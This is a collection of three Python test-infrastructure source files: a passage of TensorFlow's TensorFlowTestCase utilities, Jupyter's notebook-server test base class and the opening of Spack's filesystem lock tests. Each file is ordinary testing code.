# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
self.setUp()
def run_eager_mode(self, **kwargs):
if force_gpu:
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with context.device(gpu_name):
f(self)
elif use_gpu:
# TODO(xpan): Support softplacement and gpu by default when available.
f(self, **kwargs)
else:
with context.device("/device:CPU:0"):
f(self, **kwargs)
if assert_no_eager_garbage:
run_eager_mode = assert_no_new_tensors(
assert_no_garbage_created(run_eager_mode))
with context.eager_mode():
with ops.Graph().as_default():
run_eager_mode(self, **kwargs)
return decorated
return decorator
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(local_device.physical_device_desc)
>= min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif isinstance(tensor, ops.EagerTensor):
return tensor.numpy()
elif isinstance(tensor, resource_variable_ops.ResourceVariable):
return tensor.read_value().numpy()
elif callable(tensor):
return self._eval_helper(tensor())
else:
raise ValueError("Unsupported type %s." % type(tensor))
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
This method behaves different than session.Session: for performance reasons
`test_session` will by default (if `graph` is None) reuse the same session
across tests. This means you may want to either call the function
`reset_default_graph()` before tests, or if creating an explicit new graph,
pass it here (simply setting it with `as_default()` won't do it), which will
trigger the creation of a new session.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu`
is True, TensorFlow tries to run as many ops on the GPU as possible. If both
`force_gpu and `use_gpu` are False, all ops are pinned to the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif force_gpu and config.allow_soft_placement:
config = config_pb2.ConfigProto().CopyFrom(config)
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.arithmetic_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
if graph is None:
if self._cached_session is None:
self._cached_session = session.Session(
graph=None, config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(f1 == f2 or math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
print("dtype = %s, shape = %s" % (a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg=msg, equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, dict)
if a_is_dict != isinstance(b, dict):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if not work, then traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = np.array(a)
b_as_ndarray = np.array(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s." % (path_str,
path_str))
except TypeError as e:
msg = "Error: a%s has %s, but b%s has %s" % (
path_str, type(a), path_str, type(b))
e.args = ((e.args[0] + ' : ' + msg,) + e.args[1:])
raise
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray`, or any arbitrarily nested of structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray`, or any arbitrarily nested of structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if a.dtype == np.float32 or a.dtype == np.float64:
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(a, b, err_msg=msg)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" % (str(type(e)),
str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(device1, device2,
"Devices %s and %s are not equal. %s" %
(device1, device2, msg))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in
the documentation of `tf.train.Server`.
worker_config: (optional) ConfigProto to initialize workers. Can be used
to instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer, producer_version
|
launchnotebook.py | """Base class for notebook tests."""
from __future__ import print_function
import os
import sys
import time
import requests
from contextlib import contextmanager
from threading import Thread, Event
from unittest import TestCase
pjoin = os.path.join
try:
from unittest.mock import patch
except ImportError:
from mock import patch #py2
from tornado.ioloop import IOLoop
from ..notebookapp import NotebookApp
from ipython_genutils.tempdir import TemporaryDirectory
MAX_WAITTIME = 30 # seconds to wait for notebook server to start
POLL_INTERVAL = 0.1 # time between attempts
# TimeoutError is a builtin on Python 3. This can be removed when we stop
# supporting Python 2.
class TimeoutError(Exception):
pass
class NotebookTestBase(TestCase):
"""A base class for tests that need a running notebook.
This create some empty config and runtime directories
and then starts the notebook server with them.
"""
port = 12341
config = None
@classmethod
def wait_until_alive(cls):
"""Wait for the server to be alive"""
url = 'http://localhost:%i/api/contents' % cls.port
for _ in range(int(MAX_WAITTIME/POLL_INTERVAL)):
try:
requests.get(url)
except Exception as e:
if cls.notebook.poll() is not None:
raise RuntimeError("The notebook server exited with status %s" \
% cls.notebook.poll())
time.sleep(POLL_INTERVAL)
else:
return
raise TimeoutError("The notebook server didn't start up correctly.")
@classmethod
def wait_until_dead(cls):
"""Wait for the server process to terminate after shutdown"""
cls.notebook_thread.join(timeout=MAX_WAITTIME)
if cls.notebook_thread.is_alive():
raise TimeoutError("Undead notebook server")
@classmethod
def setup_class(cls):
cls.home_dir = TemporaryDirectory()
data_dir = TemporaryDirectory()
cls.env_patch = patch.dict('os.environ', {
'HOME': cls.home_dir.name,
'IPYTHONDIR': pjoin(cls.home_dir.name, '.ipython'),
'JUPYTER_DATA_DIR' : data_dir.name
})
cls.env_patch.start()
cls.config_dir = TemporaryDirectory()
cls.data_dir = data_dir
cls.runtime_dir = TemporaryDirectory()
cls.notebook_dir = TemporaryDirectory()
app = cls.notebook = NotebookApp(
port=cls.port,
port_retries=0,
open_browser=False,
config_dir=cls.config_dir.name,
data_dir=cls.data_dir.name,
runtime_dir=cls.runtime_dir.name,
notebook_dir=cls.notebook_dir.name,
config=cls.config,
)
# clear log handlers and propagate to root for nose to capture it
# needs to be redone after initialize, which reconfigures logging
app.log.propagate = True
app.log.handlers = []
app.initialize(argv=[])
app.log.propagate = True
app.log.handlers = []
started = Event()
def start_thread():
loop = IOLoop.current()
loop.add_callback(started.set)
try:
app.start()
finally:
# set the event, so failure to start doesn't cause a hang
started.set()
cls.notebook_thread = Thread(target=start_thread)
cls.notebook_thread.start()
started.wait()
cls.wait_until_alive()
@classmethod
def teardown_class(cls):
cls.notebook.stop()
cls.wait_until_dead()
cls.env_patch.start()
cls.home_dir.cleanup()
cls.config_dir.cleanup()
cls.data_dir.cleanup()
cls.runtime_dir.cleanup()
cls.notebook_dir.cleanup()
@classmethod
def base_url(cls):
return 'http://localhost:%i/' % cls.port
@contextmanager
def assert_http_error(status, msg=None):
try:
yield
except requests.HTTPError as e:
real_status = e.response.status_code
assert real_status == status, \
"Expected status %d, got %d" % (status, real_status)
if msg:
assert msg in str(e), e
else:
assert False, "Expected HTTP error status" |
lock.py | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""These tests ensure that our lock works correctly.
This can be run in two ways.
First, it can be run as a node-local test, with a typical invocation like
this::
spack test lock
You can *also* run it as an MPI program, which allows you to test locks
across nodes. So, e.g., you can run the test like this::
mpirun -n 7 spack test lock
And it will test locking correctness among MPI processes. Ideally, you
want the MPI processes to span across multiple nodes, so, e.g., for SLURM
you might do this::
srun -N 7 -n 7 -m cyclic spack test lock
You can use this to test whether your shared filesystem properly supports
POSIX reader-writer locking with byte ranges through fcntl.
If you want to test on multiple filesystems, you can modify the
``locations`` list below. By default it looks like this::
locations = [
tempfile.gettempdir(), # standard tmp directory (potentially local)
'/nfs/tmp2/%u', # NFS tmp mount
'/p/lscratch*/%u' # Lustre scratch mount
]
Add names and paths for your preferred filesystem mounts to test on them;
the tests are parametrized to run on all the filesystems listed in this
dict. Note that 'tmp' will be skipped for MPI testing, as it is often a
node-local filesystem, and multi-node tests will fail if the locks aren't
actually on a shared filesystem.
"""
import collections
import errno
import fcntl
import getpass
import glob
import os
import shutil
import socket
import tempfile
import traceback
from contextlib import contextmanager
from multiprocessing import Process, Queue
import pytest
import llnl.util.lock as lk
import llnl.util.multiproc as mp
from llnl.util.filesystem import touch
#
# This test can be run with MPI. MPI is "enabled" if we can import
# mpi4py and the number of total MPI processes is greater than 1.
# Otherwise it just runs as a node-local test.
#
# NOTE: MPI mode is different from node-local mode in that node-local
# mode will spawn its own test processes, while MPI mode assumes you've
# run this script as a SPMD application. In MPI mode, no additional
# processes are spawned, and you need to ensure that you mpirun the
# script with enough processes for all the multiproc_test cases below.
#
# If you don't run with enough processes, tests that require more
# processes than you currently have will be skipped.
#
mpi = False
comm = None
try:
from mpi4py import MPI
comm = MPI.COMM_WORLD
if comm.size > 1:
mpi = True
except ImportError:
pass
"""This is a list of filesystem locations to test locks in. Paths are
expanded so that %u is replaced with the current username. '~' is also
legal and will be expanded to the user's home directory.
Tests are skipped for directories that don't exist, so you'll need to
update this with the locations of NFS, Lustre, and other mounts on your
system.
"""
locations = [
tempfile.gettempdir(),
os.path.join('/nfs/tmp2/', getpass.getuser()),
os.path.join('/p/lscratch*/', getpass.getuser()),
]
"""This is the longest a failed multiproc test will take.
Barriers will time out and raise an exception after this interval.
In MPI mode, barriers don't time out (they hang). See mpi_multiproc_test.
"""
barrier_timeout = 5
"""This is the lock timeout for expected failures.
This may need to be higher for some filesystems."""
lock_fail_timeout = 0.1
def make_readable(*paths):
for path in paths:
mode = 0o555 if os.path.isdir(path) else 0o444
os.chmod(path, mode)
def make_writable(*paths):
for path in paths:
mode = 0o755 if os.path.isdir(path) else 0o744
os.chmod(path, mode)
@contextmanager
def read_only(*paths):
modes = [os.stat(p).st_mode for p in paths]
make_readable(*paths)
yield
for path, mode in zip(paths, modes):
os.chmod(path, mode)
